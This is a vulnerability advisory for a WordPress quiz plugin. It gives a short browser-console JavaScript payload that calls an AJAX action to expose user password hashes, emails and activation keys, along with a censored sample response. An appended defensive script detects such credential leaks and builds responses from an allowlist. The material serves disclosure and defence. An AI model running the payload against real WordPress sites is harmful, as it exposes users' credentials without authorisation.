Quiz Maker 6.2 - Sensitive Data Exposure (Authenticated User Credentials)

2022.01.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Quiz Maker 6.2 - Sensitive Data Exposure (User Credentials)
# Exploit Author: Gh05t666nero
# Team: INDOGHOSTSEC
# Date: 24/01/2022
# Vendor: Quiz Maker team
# Product: https://wordpress.org/plugins/quiz-maker
# Version: 6.2.9.5
# Summary: Quiz Maker plugin allows you to create powerful and engaging quizzes, tests, and exams within minutes. This WordPress plugin offers dozens of options to build fully customizable and advanced level exams. You can build an unlimited number of quizzes and questions. No limit on the count of participants taking the test at the same time.
# Description: The plugin exposes user credentials such as passwords via a request made by an authenticated user (not necessarily an Administrator).
# Tested on: WordPress 5.8+
# Vulnerability discovered by Gh05t666nero (Ojan) | Cyber Security Foundation Professional Certificate (CSFPC)

# Make sure you are logged in and run the payload below from the Console in DevTools:

var xhr = new XMLHttpRequest();
xhr.open('POST', '/wp-admin/admin-ajax.php', true);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.onload = function () {
    console.log(this.responseText);
};
xhr.send("action=ays_get_user_information");

# Response (censored):

{
    "data": {
        "ID": "30",
        "user_login": "ojan",
        "user_pass": "$P$Bm8d[REDACTED]WhKu0",
        "user_nicename": "ojan",
        "user_email": "ojan[REDACTED].com",
        "user_url": "",
        "user_registered": "202[REDACTED]7:09",
        "user_activation_key": "1642[REDACTED]06:$P$Bo[REDACTED]cD1O/",
        "user_status": "0",
        "display_name": "M[REDACTED]a"
    },
    "ID": 30,
    "caps": {
        "um_eb": true
    },
    "cap_key": "wp_capabilities",
    "roles": [
        "um_eb"
    ],
    "allcaps": {
        "read": true,
        "um_eb": true
    },
    "filter": null
}
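
A defender's regression check for a response of this shape, as an added example that is not part of the advisory or the plugin's code: it flags credential fields in a JSON body and rebuilds the reply from an allowlist. The sample response is constructed, and `PUBLIC_FIELDS` and the function names are assumptions.

```javascript
// Key names taken from the response shown in the advisory.
const SENSITIVE_KEYS = new Set(['user_pass', 'user_activation_key']);
// Portable phpass hash: "$P$" or "$H$" followed by 31 characters of its alphabet.
const PHPASS_RE = /\$[PH]\$[./0-9A-Za-z]{31}/;
// Assumption: the only fields the front end needs. Adjust to the real use case.
const PUBLIC_FIELDS = ['ID', 'display_name'];

// Walk a parsed JSON value; report sensitive keys and hash-shaped strings by path.
function findCredentialLeaks(value, path = '$', findings = []) {
  if (typeof value === 'string') {
    if (PHPASS_RE.test(value)) findings.push({ path, reason: 'phpass-shaped value' });
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => findCredentialLeaks(v, `${path}[${i}]`, findings));
  } else if (value !== null && typeof value === 'object') {
    for (const [key, v] of Object.entries(value)) {
      const child = `${path}.${key}`;
      if (SENSITIVE_KEYS.has(key)) findings.push({ path: child, reason: 'sensitive key' });
      else findCredentialLeaks(v, child, findings);
    }
  }
  return findings;
}

// Build the reply from an allowlist instead of serialising the whole user object.
function toPublicUser(response) {
  const data = (response && response.data) || {};
  const out = {};
  for (const field of PUBLIC_FIELDS) {
    if (Object.prototype.hasOwnProperty.call(data, field)) out[field] = data[field];
  }
  return out;
}

// Constructed sample with the same shape as the advisory's response (fake values).
const SAMPLE_RESPONSE = {
  data: {
    ID: '30',
    user_login: 'example',
    user_pass: '$P$B' + 'a'.repeat(30),
    user_email: 'user@example.test',
    user_activation_key: '1642000000:$P$B' + 'b'.repeat(30),
    display_name: 'Example User',
  },
  ID: 30,
  roles: ['subscriber'],
};

console.log(findCredentialLeaks(SAMPLE_RESPONSE), toPublicUser(SAMPLE_RESPONSE));
```

Run `findCredentialLeaks` over captured responses from any `admin-ajax.php` action in a test suite; a non-empty result means the handler is returning more of the user record than the client should see.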

